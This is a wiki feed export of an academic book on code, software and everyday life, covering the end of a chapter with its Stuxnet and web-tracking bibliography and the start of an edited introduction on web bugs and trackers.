model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4698</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4698"/>
		<updated>2012-04-18T13:41:56Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
